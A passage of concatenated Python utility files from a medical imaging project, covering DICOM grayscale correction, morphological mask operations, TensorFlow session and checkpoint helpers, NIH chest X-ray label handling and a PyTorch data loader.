erosion_size = int(np.sqrt(size[0] * size[1]) / ero_factor)
image_array = dilate(image_array, -erosion_size)
if blur_factor:
image_array = gaussian(image_array, sigma=size / blur_factor)
return image_array
def dilate(binary_array, dilation_kernel_size):
"""
Args:
binary_array:
dilation_kernel_size: an integer. Erode if negative, dilate if positive.
This kernel size is diameter
Returns:
Dilated or eroded binary array
"""
if dilation_kernel_size == 0:
return binary_array
if dilation_kernel_size < 0:
dilation_kernel_size = -dilation_kernel_size
kernel = np.ones((dilation_kernel_size, dilation_kernel_size), np.uint8)
binary_array = cv2.erode(binary_array.astype(np.uint8), kernel, iterations=1)
else:
kernel = np.ones((dilation_kernel_size, dilation_kernel_size), np.uint8)
binary_array = cv2.dilate(binary_array.astype(np.uint8), kernel, iterations=1)
binary_array = binary_array.astype(np.bool)
return binary_array
def clean_bg_component(prob_array, threshold=0.5, anchor_patch=10):
"""Keep the central connected component and set the rest of the pixels to 0
Note that the current algorithm requires that the ceneral pixel
Args:
prob_array: a probability array with values between 0 and 1
anchor_patch: collect all non-zero labels in this center patch and find connected component.
Sometimes the center of the patch does not lie in any foreground connected component mask,
and this serves as a temporary solution.
Returns:
masked_prob_array: the masked prob array
"""
binary_array = prob_array > threshold
labeled_mask_array = measure.label(binary_array, connectivity=2)
y_c, x_c = np.array(binary_array.shape) // 2
central_component_idx = np.unique(
labeled_mask_array[(y_c - anchor_patch // 2):(y_c + anchor_patch // 2),
(x_c - anchor_patch // 2):(x_c + anchor_patch // 2)])
central_component_idx = [x for x in central_component_idx if x]
center_mask = np.zeros_like(binary_array)
if not central_component_idx:
# If cannot find central connected component, return the original input
return prob_array, labeled_mask_array
for idx in central_component_idx:
center_mask[labeled_mask_array == idx] = 1
masked_prob_array = prob_array * center_mask
return masked_prob_array, labeled_mask_array
def opening(binary_array, open_kernel_size):
"""
Args:
binary_array:
open_kernel_size(int): Closing if negative, opening if positive
Returns:
"""
if open_kernel_size == 0:
return binary_array
if open_kernel_size < 0:
open_kernel_size = -open_kernel_size
kernel = np.ones((open_kernel_size, open_kernel_size), np.uint8)
binary_array = cv2.dilate(binary_array.astype(np.uint8), kernel, iterations=1)
binary_array = cv2.erode(binary_array.astype(np.uint8), kernel, iterations=1)
else:
kernel = np.ones((open_kernel_size, open_kernel_size), np.uint8)
binary_array = cv2.erode(binary_array.astype(np.uint8), kernel, iterations=1)
binary_array = cv2.dilate(binary_array.astype(np.uint8), kernel, iterations=1)
binary_array = binary_array.astype(np.bool)
return binary_array
class DicomCorrector(object):
def __init__(self, dicom_path, level):
"""Correct dicom grayscale according to LUT
Ref: http://dicom.nema.org/medical/dicom/2017a/output/chtml/part03/sect_C.11.html
There 3 stages or transforms within the DICOM rendering pipeline with regards to applying Lookup tables that
can alter input values for rendering. Used within these stages are 4 types of lookup table (LUT) which can be
found within DICOM images are part of the standard, and one further type which exists in DicomObjects. These
together with a number of other Pixel data modifiers are used within the pipeline to produce a flexible
rendering chain.
Args:
dicom_path:
level: gamma correction levels, could be `softer`, `normal` or `harder`
"""
self._dicom_path = dicom_path
try:
self._ds = dicom.read_file(dicom_path)
self._image_array = self._ds.pixel_array
except:
print("Dicom reading error")
# Add preamble manually
fp = BytesIO()
fp.write(b'\x00' * 128)
fp.write(b'DICM')
# Add the contents of the file
f = open(dicom_path, 'rb')
fp.write(f.read())
f.close()
fp.seek(0)
# Read the dataset:
self._ds = dicom.read_file(fp, force=True)
import pydicom.uid
self._ds.file_meta.TransferSyntaxUID = dicom.uid.ImplicitVRLittleEndian # or whatever is the correct transfer syntax for the file
self._image_array = self._ds.pixel_array
self._level = level
# original array before correction
self._raw_array = self._image_array.copy()
@staticmethod
def look_up_value(lut_sequence, image_array, level):
"""
Args:
voi_lut_module: An element of VOILUTSequence
image_array(np.array):
Returns:
"""
for i in range(lut_sequence.VM):
lut_descriptor = lut_sequence[i][0x28, 0x3002].value
lut_explanation = lut_sequence[i][0x28, 0x3003].value
lut_data = lut_sequence[i][0x28, 0x3006].value
num_entries = lut_descriptor[0]
offset = lut_descriptor[1]
if lut_explanation.lower() == level.lower():
image_array = np.clip(image_array, offset, num_entries + offset - 1)
image_array = image_array - offset
lut = np.asarray(lut_data)
image_array = lut[image_array.astype(int)]
return image_array
def voi_lut_windowing(self, win_center, win_width, fun_type="linear"):
"""VOI LUT function is LINEAR
Args:
win_center:
win_width:
fun_type:
Returns:
"""
assert fun_type.lower() in ['linear', 'sigmoid', 'linear_exact']
print('Using windowing type `{}`'.format(fun_type))
if fun_type.lower() == "linear":
lower_bound = win_center - 0.5 - (win_width - 1) / 2
upper_bound = win_center - 0.5 + (win_width - 1) / 2
self._image_array[self._image_array <= lower_bound] = lower_bound
self._image_array[self._image_array > upper_bound] = upper_bound
self._image_array[(self._image_array > lower_bound) * (self._image_array <= upper_bound)] = \
((self._image_array[(self._image_array > lower_bound) * (self._image_array <= upper_bound)]
- (win_center - 0.5)) / (win_width - 1) + 0.5) * (upper_bound - lower_bound) + lower_bound
elif fun_type.lower() == "sigmoid":
bits_stored = self._ds[0x28, 0x101].value
output_range = 2**bits_stored
self._image_array = output_range / (1 + np.exp(-4*(self._image_array-win_center))/win_width)
elif fun_type.lower() == "linear_exact":
lower_bound = win_center - win_width / 2
upper_bound = win_center + win_width / 2
self._image_array[self._image_array <= lower_bound] = lower_bound
self._image_array[self._image_array > upper_bound] = upper_bound
self._image_array[(self._image_array > lower_bound)*(self._image_array<=upper_bound)] = \
(self._image_array - win_center) / win_width * (upper_bound - lower_bound) + lower_bound
def modality_lut(self):
"""This function transforms the manufacturer dependent pixel values into pixel values which are meaningful for
the modality and which are manufacturer independent.
Returns:
"""
try:
modality_lut_sequence = self._ds[0x28, 0x3000]
self._image_array = DicomCorrector.look_up_value(modality_lut_sequence, self._image_array, self._level)
except:
try:
print("Use rescaling to do the modality lut")
intercept = self._ds[0x28, 0x1052].value
slope = self._ds[0x28, 0x1053].value
self._image_array = self._image_array * slope + intercept
except:
print("Unable to do the modaligy lut", self._dicom_path)
def voi_lut(self):
"""The Value Of Interest(VOI) LUT transformation transforms the modality pixel values into pixel values which
are meaningful for the user or the application.
Args:
level:
Returns:
"""
try:
voi_lut_sequence = self._ds[0x28, 0x3010]
self._image_array = DicomCorrector.look_up_value(voi_lut_sequence, self._image_array, self._level)
except:
print("Render the gray scale into window")
try:
win_center_list = self._ds[0x28, 0x1050].value
win_width_list = self._ds[0x28, 0x1051].value
if self._ds[0x28, 0x1051].VM == 1:
win_center = win_center_list
win_width = win_width_list
else:
zipped = zip(win_width_list, win_center_list)
zipped_sorted = sorted(zipped, key=lambda t: t[0])
if self._level.lower() == "softer":
win_center = zipped_sorted[0][1]
win_width = zipped_sorted[0][0]
elif self._level.lower() == "normal":
win_center = zipped_sorted[1][1]
win_width = zipped_sorted[1][0]
elif self._level.lower() == "harder":
win_center = zipped_sorted[2][1]
win_width = zipped_sorted[2][0]
else:
raise KeyError("Input level error, should be softer, normal or harder")
print('Level `{}` not found'.format(self._level))
try:
function_type = self._ds[0x28, 0x1056]
self.voi_lut_windowing(win_center, win_width, function_type)
except:
self.voi_lut_windowing(win_center, win_width)
except:
print("Unable to do the voi lut", self._dicom_path)
def presentation_lut(self):
"""The Presentation LUT transformation transforms the pixel values into P-Values, a device independent perceptually
linear space.
Returns:
"""
try:
presentation_lut_shape = self._ds[0x2050, 0x0020].value
if presentation_lut_shape.lower == "invert" or presentation_lut_shape.lower() == "inverse":
self._image_array = np.max(self._image_array) - self._image_array
except:
print("Use photometric interpretation to check invert", self._dicom_path)
try:
photometric_interpretation = self._ds[0x28, 0x4].value
if photometric_interpretation == "MONOCHROME1":
self._image_array = np.max(self._image_array) - self._image_array
except:
print("Unable to do the presentation lut", self._dicom_path)
def correct(self):
"""The main function to correct dicom pixel_value error.
Returns:
"""
try:
self.modality_lut()
self.voi_lut()
self.presentation_lut()
return self._image_array
except:
print("Correction Error", self._dicom_path)
<file_sep>"""This script documents useful decorators"""
import logging
import time
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(message)s')
def clock(func):
"""Decorator for profiling purpose"""
def clocked(*args, **kwargs):
t0 = time.time()
result = func(*args, **kwargs)
elapsed = time.time() - t0
name = func.__name__
arg_str = ', '.join(repr(arg) for arg in args)
# print('[%0.8fs] %s(%s) -> %r' % (elapsed, name, arg_str, result))
print('[%0.8fs] %s -> %r' % (elapsed, name, result))
return result
return clocked
def dump_func_name(func):
"""This decorator prints out function name when it is called
Args:
func:
Returns:
"""
def echo_func(*func_args, **func_kwargs):
logging.debug('### Start func: {}'.format(func.__name__))
return func(*func_args, **func_kwargs)
return echo_func
def clock_test():
@dump_func_name
@clock
def fibonacci(n):
if n < 2:
return n
return fibonacci(n - 2) + fibonacci(n - 1)
print(fibonacci(6))
if __name__ == '__main__':
clock_test()<file_sep>"""Functions for 1d signal processing"""
import numpy as np
import scipy
def smooth_mean(y, window=11, mode='valid'):
box = np.ones(window) / window
if mode == 'valid':
y = np.pad(y, pad_width=(window)//2, mode='reflect')
y_smooth = np.convolve(y, box, mode=mode)
return y_smooth
def smooth_med(y, window=11):
y_smooth = scipy.signal.medfilt(y, kernel_size=window)
return y_smooth
def my_smooth(y, window=11):
y_smooth = smooth_mean(smooth_med(y, window=window))
return y_smooth<file_sep>import os
import json
from projects.drutils import fileio
from projects.drutils.tf_utils import FlagsObjectView
from distutils.version import StrictVersion
import tensorflow as tf
import tensorflow.contrib.image
def setup_gpu(cuda_device_id):
# Set up GPU device
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ['CUDA_VISIBLE_DEVICES'] = str(cuda_device_id)
def set_session_keras(allow_growth=True, log_device_placement=False, fraction=0.8):
"""Set default (global) session for keras
Args:
allow_growth:
log_device_placement:
Returns:
None
"""
import tensorflow as tf
import keras
config = tf.ConfigProto()
# Allow GPU growth
config.gpu_options.allow_growth = allow_growth # dynamically grow the memory used on the GPU
config.gpu_options.per_process_gpu_memory_fraction = fraction
# Log device placement (on which device the operation ran)
# (nothing gets printed in Jupyter, only if you run it standalone)
config.log_device_placement = log_device_placement
sess = tf.Session(config=config)
keras.backend.tensorflow_backend.set_session(sess) # set this TensorFlow session as the default session for Keras
def get_session_tf(allow_growth=True, log_device_placement=False, fraction=1.0):
"""Get a well-behaved session for tensorflow
Usage:
Replace the normal
```
with tf.Session() as sess:
# run graph
```
with
```
with gpu.get_session_tf() as sess:
# run graph
```
Args:
allow_growth:
log_device_placement:
Returns:
sess: a configured tf session
"""
import tensorflow as tf
# Allow GPU growth
config = tf.ConfigProto()
# Allow GPU growth
config.gpu_options.allow_growth = allow_growth # dynamically grow the memory used on the GPU
config.gpu_options.per_process_gpu_memory_fraction = fraction
# Log device placement (on which device the operation ran)
# (nothing gets printed in Jupyter, only if you run it standalone)
config.log_device_placement = log_device_placement
sess = tf.Session(config=config)
return sess
def log_flags(flags, logdir, log_name='config.json'):
"""Log tf FLAGS to json"""
fileio.maybe_make_new_dir(logdir)
config_log = os.path.join(logdir, log_name)
if flags is None:
config_dict = {}
else:
# for tensorflow 1.5 and above
if StrictVersion(tf.__version__) >= StrictVersion('1.5.0'):
flags = FlagsObjectView(flags)
config_dict = flags.__dict__
with open(config_log, 'w') as f:
json.dump(config_dict, f, indent=1, sort_keys=True)
def load_graph_ckpt(filepath, gpu_memory_fraction=1.0):
"""Load model from tensorflow ckpt file
There should be 3 files starting with `filepath`
.meta (contains the graph)
.index
.data (contains the weight)
"""
sess = get_session_tf(gpu_memory_fraction)
saver = tf.train.import_meta_graph(filepath + '.meta')
saver.restore(sess, filepath)
print('Graph loaded from ckpt.')
return sess
def load_new_graph_ckpt(filepath, gpu_memory_fraction=1.0):
"""Load model from a specific tensorflow ckpt file
There should be 3 files starting with `filepath`
.meta (contains the graph)
.index
.data (contains the weight)
"""
g = tf.Graph()
with g.as_default():
sess = get_session_tf(gpu_memory_fraction)
saver = tf.train.import_meta_graph(filepath + '.meta')
saver.restore(sess, filepath)
print('Graph loaded from ckpt.')
return sess
def load_tf_checkpoint(model_path):
"""Load model from "latest" checkpoint
Args:
model_path: Checkpoint path
Returns:
Current session
"""
import tensorflow as tf
checkpoint_path = tf.train.latest_checkpoint(model_path)
meta_file = checkpoint_path + '.meta'
g = tf.Graph()
with g.as_default():
sess = get_session_tf()
saver = tf.train.import_meta_graph(meta_file)
saver.restore(sess, checkpoint_path)
return sess
def load_tf_frozen_graph(frozen_graph_filename):
"""Load model from frozen graph
Args:
frozen_graph_filename: File name of the frozen graph
Returns:
A TensorFlow graph containing the loaded model
"""
import tensorflow as tf
# We load the protobuf file from the disk and parse it to retrieve the
# unserialized graph_def
with tf.gfile.GFile(frozen_graph_filename, "rb") as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
# Then, we import the graph_def into a new Graph and returns it
with tf.Graph().as_default() as graph:
# The name var will prefix every op/nodes in your graph
# Since we load everything in a new graph, this is not needed
tf.import_graph_def(graph_def, name='')
sess = get_session_tf()
return sess
<file_sep>"""This file contains utility functions used for manipulating checkpoint files"""
import tensorflow as tf
from tensorflow.python.tools import freeze_graph
import os
def genenerate_pb(sess, save_dir, ckpt_name, pb_file_name, output_node_name):
"""Generate .pb model file for loading in C++.
This function gets the network structure from sess and restores from checkpoint stored in ckpt_name.
Args:
sess:
save_dir:
ckpt_name:
pb_file_name:
output_node_name:
Returns:
None
"""
tf.train.write_graph(sess.graph_def, save_dir, pb_file_name + '.pbtxt', as_text=True)
g_new = tf.Graph()
with g_new.as_default():
input_graph = os.path.join(save_dir, pb_file_name + '.pbtxt')
input_checkpoint = os.path.join(save_dir, ckpt_name)
output_graph = os.path.join(save_dir, pb_file_name+'.pb')
freeze_graph.freeze_graph(input_graph=input_graph,
input_checkpoint=input_checkpoint,
output_graph=output_graph,
output_node_names=output_node_name,
input_saver='',
input_binary=False,
restore_op_name='save/restore_all',
filename_tensor_name='save/Const:0',
clear_devices='True',
initializer_nodes='')
def rename_variables_in_checkpoint(checkpoint_dir, replace_from, replace_to, add_prefix, renamed_checkpoint_dir='', dry_run=False):
"""Load varibales from a checkpoint file, rename them and save to a new file
Args:
checkpoint_dir: directory containing the old checkpoint file
dry_run: if True, perform dry run without renameing
Returns:
None
Usage:
python tensorflow_rename_variables.py --checkpoint_dir=path/to/dir --replace_from=scope1 \
--replace_to=scope1/model --add_prefix=abc/
will rename the variable scope1/Variable1 to abc/scope1/model/Variable1.
Note:
This function only helps to restore the variable values, but it does not contain any of the graph structure.
The graoph has to be rebult from scratch.
"""
g = tf.Graph()
with g.as_default():
checkpoint = tf.train.get_checkpoint_state(checkpoint_dir)
with tf.Session() as sess:
new_name_list = []
# latest = tf.train.latest_checkpoint(checkpoint_dir)
# saver = tf.train.import_meta_graph(latest + '.meta', input_map=None, import_scope='')
# saver.restore(sess, latest)
# writer = tf.summary.FileWriter('newmodel', sess.graph)
# saver.save(sess, os.path.join(checkpoint_dir, 'newmodel.ckpt'), global_step=9)
# print all nodes
# for node in tf.get_default_graph().as_graph_def().node:
# pass
# print('*')
# print(node.name)
print('load variable from {}'.format(checkpoint_dir))
for var_name, _ in tf.contrib.framework.list_variables(checkpoint_dir)[:]:
# Load the variable
var = tf.contrib.framework.load_variable(checkpoint_dir, var_name)
# Set the new name
new_name = var_name
if None not in [replace_from, replace_to]:
new_name = new_name.replace(replace_from, replace_to)
if add_prefix:
new_name = add_prefix + new_name
# dump new names to a text file
new_name_list.append(new_name)
with open('/tmp/tmp.txt', 'w') as f_out:
f_out.write('\n'.join(new_name_list))
if dry_run:
print('%s would be renamed to %s.' % (var_name, new_name))
else:
print('Renaming %s to %s.' % (var_name, new_name))
# Rename the variable
# `load_variable` does not add tensor to `GraphKeys.GLOBAL_VARIABLES`
# but `Variable()` or `get_variable()` do
var = tf.Variable(var, name=new_name)
if not dry_run:
# Save the variables
# print('***global vars: {}'.format(tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, None)))
saver = tf.train.Saver()
sess.run(tf.global_variables_initializer())
print('Saving to {}'.format(checkpoint.model_checkpoint_path))
# print('saver._var_list is {}'.format(saver._var_list))
if not renamed_checkpoint_dir:
renamed_checkpoint_dir = os.path.join(checkpoint_dir, 'renamed')
os.makedirs(renamed_checkpoint_dir, exist_ok=True)
writer = tf.summary.FileWriter(renamed_checkpoint_dir, sess.graph).close()
renamed_checkpoint_path = os.path.join(renamed_checkpoint_dir, 'renamed_checkpoint')
# os.makedirs(renamed_checkpoint_path)
saver.save(sess, renamed_checkpoint_path)
<file_sep>"""
This file contains utility functions used to convert between data format
"""
import re
import numpy as np
def parse_coord_string(bbox_coord):
"""Get coord numbers from bbox_coord
bbox_coord is in the format of `(x,w,w,h)`
Args:
bbox_coord:
Returns:
coord: a numpy array of coord
"""
fields = bbox_coord.replace(')', '').replace('(', '').split(',')
coord = np.array([int(field) for field in fields])
return coord<file_sep>"""This file contains utility functions specific to nih dataset"""
import pandas as pd
import re
try:
import dicom
except:
import pydicom as dicom
import os
import glob2
import glob
from projects.drutils import fileio
def get_name_list():
"""
# counts of images with different
Atelectasis: 11535
Cardiomegaly: 2772
Effusion: 13307
Infiltration: 19870
Mass: 5746
Nodule: 6323
Pneumonia: 1353
Pneumothorax: 5298
Consolidation: 4667
Edema: 2303
Emphysema: 2516
Fibrosis: 1686
Pleural_Thickening: 3385
Hernia: 227
No Finding: 60412
"""
NAME_LIST = ["Atelectasis", # 0
"Cardiomegaly", # 1
"Effusion", # 2
"Infiltration", # 3
"Mass", # 4
"Nodule", # 5
"Pneumonia", # 6
"Pneumothorax", # 7
"Consolidation", # 8
"Edema", # 9
"Emphysema", # 10
"Fibrosis", # 11
"Pleural_Thickening", # 12
"Hernia", # 13
"Tuberculosis", # 14
"Image_Type", # 15
"Costophrenic_Angle", # 16
"Pneumothorax_Apex"] # 17
return NAME_LIST
def generate_nih_dict():
"""Generate ddsm dictionary containing important constants of ddsm dataset
Keys:
'csv_path':
'basedir':
'all_dicom_dir':
'imagedir_list':
'maskdir_list':
Args:
Returns:
ddsm_dict: dictionary containing important constants of ddsm dataset
"""
nih_dict = {}
nih_dict['csv_path'] = r'/media/Data/Data02/Datasets/DR/NIH/Data_Entry_2017.csv'
nih_dict['NAME_LIST'] = ["Atelectasis", "Cardiomegaly", "Effusion", "Infiltration", "Mass",
"Nodule", "Pneumonia", "Pneumothorax", "Consolidation", "Edema",
"Emphysema", "Fibrosis", "Pleural_Thickening", "Hernia", "Tuberculosis"]
nih_dict['basedir'] = r'/media/Data/Data02/Datasets/DR/NIH/'
nih_dict['all_image_path_txt'] = r'/media/Data/Data02/Datasets/DR/NIH/images/All/images.txt'
nih_dict['annotation_dir'] = r'/media/Data/Data02/Datasets/DR/NIH/annotation/ver_2/images_Mass_or_Nodule/annotations/xmls'
return nih_dict
def get_image_path_from_filename(filename):
"""Get full path to image from filename
Args:
filename: image name, could be basename or barename (without ext)
Returns:
image_path
"""
# convert filename to barename
barename = os.path.basename(filename)
barename = os.path.splitext(barename)[0]
all_image_path_txt = generate_nih_dict()['all_image_path_txt']
image_path_list = fileio.read_list_from_txt(all_image_path_txt, field=0)
image_path_list = [path for path in image_path_list if barename in path]
print(image_path_list)
assert len(image_path_list) == 1, 'Found {} matching files!'.format(len(image_path_list))
image_path = image_path_list[0]
return image_path
def convert_label_to_one_hot_index(label):
"""Convert label to one-hot index with '|' as spliter
Example:
Input:
'Atelectasis|Cardiomegaly|Fibrosis'
Output:
'11000000000100'
"""
index = list('00000000000000')
NAME_LIST = generate_nih_dict()['NAME_LIST']
for i, name in enumerate(NAME_LIST):
if name in label:
index[i] = '1'
return ''.join(list(index))
def get_label_from_csv(image_name, df_or_csv, is_one_hot=True):
"""
Read label from csv given an image file. Only for NIH dataset.
Args:
image_name: basename of the image file path
df_or_csv: dataframe created from csv file, or the csv file
is_one_hot: optional, if true, convert string to one hot encoding
Return:
label: a string
"""
# generate df
if isinstance(df_or_csv, str):
try:
df = pd.read_csv(df_or_csv)
except:
raise IOError("Invalid csv file {}!".format(df_or_csv))
elif isinstance(df_or_csv, pd.core.frame.DataFrame):
df = df_or_csv
else:
raise ValueError("df_or_csv is not df nor csv!")
# look up image label in df
basename = os.path.basename(image_name)
# sometimes basename does not contain suffix
row = df.loc[df['Image Index'].str.contains(basename)]
try:
label = row["Finding Labels"].item()
except:
print('This row has multiple occurances \n{}'.format(row))
if is_one_hot:
label = convert_label_to_one_hot_index(label)
return label
def get_image_level_label_from_filename(image_name):
"""Given the image name, retrieve image-level label
Args:
image_name:
Returns:
label: image-level label
"""
csv_path = generate_nih_dict()['csv_path']
label_string = get_label_from_csv(image_name, csv_path, is_one_hot=False)
label = int("Mass" in label_string or "Nodule" in label_string)
return label
<file_sep>import os
import numpy as np
from tqdm import tqdm
import cv2
import matplotlib.pylab as plt
from collections import defaultdict
# combine into lesion masks based on lesion ids
# lesion ids are in the format of `patient-view-lesion`
class LesionMaskCombiner(object):
"""This class combines lesions based on lesion id
Args:
config: config dict with the following keys
'write_flag': whether to write to disk
'output_dir': if write_flag the target to write to
'lesion_keys': the keys to selct and combine
"""
def __init__(self, config):
self.write_flag = config['write_flag']
self.output_dir = config['output_dir']
self.lesion_keys = config['lesion_keys']
self.verbose = config['verbose']
self.patient_masks_dict = defaultdict(list)
def _write(self):
if self.verbose:
print('writing {} images'.format(len(self.patient_masks_dict)))
for key, masks in tqdm(self.patient_masks_dict.items()):
mask_array = None
for mask_path in masks:
tmp_mask = plt.imread(mask_path, -1).astype(np.bool)
if mask_array is not None:
mask_array += tmp_mask
else:
mask_array = tmp_mask
mask_array = mask_array.astype(np.uint) * 255
output_path = os.path.join(self.output_dir, '{}_combined.png'.format(key))
cv2.imwrite(output_path, mask_array)
def _combine_dict(self, lesion_dict):
assert not set(self.lesion_keys) - set(lesion_dict.keys()), 'all keys are covered in lesion_dict'
for lesion_key in self.lesion_keys:
mask_path = lesion_dict[lesion_key]
patient, view, lesion_id = lesion_key.split('-')
patient_key = '-'.join([patient, view])
self.patient_masks_dict[patient_key].append(mask_path)
def process(self, lesion_dict):
"""
Returns:
patient_masks_dict: each val is a list of masks corresponding to the patient
"""
if self.verbose:
print('processing {} lesions'.format(len(self.lesion_keys)))
# combine dict
self._combine_dict(lesion_dict)
# write to disk
if self.write_flag:
self._write()
return self.patient_masks_dict
<file_sep>'''
data generator for the global local net
v0: for resnet34 only
v1: for global local with only local path, prepare the data for the input['local']
'''
import torch
from torch.utils.data import Dataset, DataLoader
import torchvision
from torchvision import transforms, utils
import pandas as pd
import random
import os
import math
# from skimage import io, transform
import numpy as np
import cv2
from time import time
from PIL import Image
from imgaug import augmenters as iaa
import matplotlib.pyplot as plt
plt.ion()
class dataconfig(object):
def __init__(self, dataset = 'defaut',subset = '0', **kwargs):
self.dataset = dataset
self.dir = r'E:\Xing\SDFY_skin\Crops_M'
self.csv = 'Gl_summery_csv_valid.csv'
self.subset = subset
self.csv_file = os.path.join(self.dir,self.csv)
class batch_sampler():
def __init__(self, batch_size, class_list):
self.batch_size = batch_size
self.class_list = class_list
self.unique_value = np.unique(class_list)
self.iter_list = []
self.len_list = []
for v in self.unique_value:
indexes = np.where(self.class_list == v)[0]
self.iter_list.append(self.shuffle_iterator(indexes))
self.len_list.append(len(indexes))
self.len = len(class_list) // batch_size
# print('self.len: ', self.len)
def __iter__(self):
index_list = []
for _ in range(self.len):
for index in range(self.batch_size):
index_list.append(next(self.iter_list[index % len(self.unique_value)]))
np.random.shuffle(index_list)
yield index_list
index_list = []
def __len__(self):
return self.len
@staticmethod
def shuffle_iterator(iterator):
# iterator should have limited size
index = list(iterator)
total_size = len(index)
i = 0
random.shuffle(index)
while True:
yield index[i]
i += 1
if i >= total_size:
i = 0
random.shuffle(index)
class DataGenerator(Dataset):
def __init__(self, config=None,transform = None):
self.config = config
self.debug = False
self.df = self.parse_csv(self.config.csv_file, self.config.subset)
self.df.reset_index(drop=True, inplace=True)
self.transform = transform
def __len__(self):
print('len = {}'.format(len(self.df)))
return len(self.df)
def img_augmentation(self, img, seq_det):
img = img.transpose(2, 0, 1)
for i in range(len(img)):
img[i, :, :] = seq_det.augment_image(img[i, :, :])
img = img.transpose(1, 2, 0)
# img = seq_det.augment_images(img)
return img
def __getitem__(self, index):
# print(index)
img_path = self.df.loc[index, 'crop_1024_path']
# print(img_path)
# image = cv2.imread(img_path)
image = Image.open(img_path)
# label = self.df.loc[index,'Shape']
label = self.df.loc[index, 'BM']
# label = label.reshape(-1,1)
# landmarks = landmarks.reshape(-1, 2)
# sample = {'image': image, 'label': label}
if self.transform:
image = np.array(image)
image = cv2.resize(image, (384, 384), interpolation=cv2.INTER_NEAREST)
# dec = random.choice(range(2))
# if dec == 1 and self.df.loc[index, 'valid'] == 0:
if self.df.loc[index, 'valid'] == 0:
# print('{} is img_auged'.format(index))
seq = iaa.SomeOf((3, 6), [
iaa.Fliplr(0.8),
iaa.Flipud(0.8),
iaa.Multiply((0.8, 1.2)),
iaa.GaussianBlur(sigma=(0.0, 0.2)),
iaa.PiecewiseAffine((0.02, 0.06)),
iaa.Affine(
rotate=(-5, 5),
shear=(-5, 5),
scale=({'x': (0.8, 1.1), 'y': (0.8, 1.1)}) # to strentch the image along x,y axis
)
])
seq_det = seq.to_deterministic()
image = self.img_augmentation(image, seq_det=seq_det)
# image = transforms.ToPILImage()(image)
# plt.imshow(image),plt.show()
# image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# image = transforms.ToPILImage()(image)
image = self.transform(image)
mask = image[0,:,:]
img = image[2,:,:]
image = torch.stack([img,img,img])
if self.debug:
pass
return image,mask,label
@staticmethod
def parse_csv(csv_file, subset):
data_frame = pd.read_csv(csv_file)
data_frame = data_frame[data_frame['valid'] == int(subset)]
return data_frame
def show_landmarks(image, landmarks):
"""SHow image with landmarks"""
plt.imshow(image)
# plt.scatter(landmarks[:, 0], landmarks[:, 1], s=10, marker=".", c="r")
if __name__ == "__main__":
valconfig = {"dataset": "calc","subset": '1'}
val_config = dataconfig(**valconfig)
validation_data = DataGenerator(val_config,transform= transforms.ToTensor())
val_loader = DataLoader(validation_data, num_workers=1)
for i, (images, labels) in enumerate(val_loader):
print(i)
print(labels)
print(images.shape)
<file_sep>"""This file contains utility functions used for configuration"""
import json
import tensorflow as tf
import os
FLAGS = tf.app.flags.FLAGS
def maybe_load_from_json_and_overwrite(json_filepath):
if json_filepath:
assert os.path.isfile(json_filepath), "invalid json file!"
with open(json_filepath) as json_data:
d = json.load(json_data)
print('Keys loaded from json files')
for key, val in sorted(d.items()):
# skip keys starting with `_` (used for commenting)
if not key.startswith('_'):
FLAGS.__flags[key] = val
print('\t{:40s} : {}'.format(key, val))
<file_sep>"""
Conversion of different format
"""
import SimpleITK as sitk
import cv2
import functools
import glob2
import tensorflow as tf
import numpy as np
import os
from tqdm import tqdm
import matplotlib.pyplot as plt
from projects.drutils import fileio
from projects.drutils import augmentation
from projects.drutils import data
# parse list from args
def csv_to_list(csv_string, type=str):
return [type(item.strip()) for item in csv_string.strip().split(',') if item.strip()]
def scale_to_255(image_array):
"""Default normalizing functor to scale image to [0, 255]"""
a_min = min(image_array.min(), 0)
a_max = image_array.max()
image_array = (image_array - a_min)/ (a_max - a_min) * 255
return image_array
def dicom2png(dicom_filepath, png_filepath=None, normalize_functor=scale_to_255, dryrun=False):
"""Convert dicom image to png file
Args:
dicom_filepath:
png_filepath:
normalize_functor: normalizing function
Returns:
image_array: a numpy array containing the image
"""
image_array = data.get_pixel_array_from_dicom_path(dicom_filepath, to_bit=-1)
if normalize_functor:
image_array = normalize_functor(image_array)
if image_array.max() <= 1:
image_array = (image_array * 255).astype(np.uint8)
if not dryrun:
fileio.maybe_make_new_dir(os.path.dirname(png_filepath))
cv2.imwrite(png_filepath, image_array)
return image_array
def dicom2png_batch(dicom_search_path, png_filepath_replacer, nfiles=None, normalize_functor=scale_to_255):
"""Convert png to nii in batch mode
Args:
dicom_search_path: can be a glob2 search pattern or directory
png_filepath_replacer: a function to convert dicom filepath to png filepath
nfiles: max number of files to convert
normalize_functor: a function to normalize input images
Returns:
None
"""
if os.path.isdir(dicom_search_path):
file_list = glob2.glob(os.path.join(dicom_search_path, '**', '*dcm'))
else:
file_list = glob2.glob(dicom_search_path)
if nfiles is not None:
file_list = file_list[:nfiles]
for dicom_filepath in tqdm(file_list):
png_filepath = png_filepath_replacer(dicom_filepath)
print('{} --> {}'.format(dicom_filepath, png_filepath))
dicom2png(dicom_filepath, png_filepath, normalize_functor=normalize_functor)
def png2nii(png_filepath, nii_filepath):
"""Convert png to nii format
Args:
png_filepath:
nii_filepath:
Returns:
None
"""
image = sitk.ReadImage(png_filepath)
# make parent directory otherwise sitk will not write files
fileio.maybe_make_new_dir(os.path.dirname(nii_filepath))
sitk.WriteImage(image, nii_filepath)
# visualization
# img_array = sitk.GetArrayFromImage(image)
# plt.imshow(img_array)
def png2nii_batch(png_folder, nii_folder, nfiles=None):
"""Convert png to nii in batch mode
Args:
png_folder:
nii_folder:
Returns:
None
"""
assert os.path.isdir(png_folder), 'input is not a valid folder'
file_list = glob2.glob(os.path.join(png_folder, '**', '*dcm'))
if nfiles is not None:
file_list = file_list[:nfiles]
for i, png_filepath in enumerate(file_list):
nii_filepath = png_filepath.replace(png_folder, nii_folder + os.sep)
nii_filepath = nii_filepath.replace('.png', '.nii')
print('{}: {} --> {}'.format(i, png_filepath, nii_filepath))
png2nii(png_filepath, nii_filepath)
def sitk_2d_to_3d(sitk_image_2d, is_binary=False):
"""Convert 2d simple itk image to 3d
Args:
sitk_image_2d: a 2d sitk image
Returns:
sitk_image_3d: a 3d sitk image with depth padded to 1
"""
png_array2D = sitk.GetArrayFromImage(sitk_image_2d)
if is_binary:
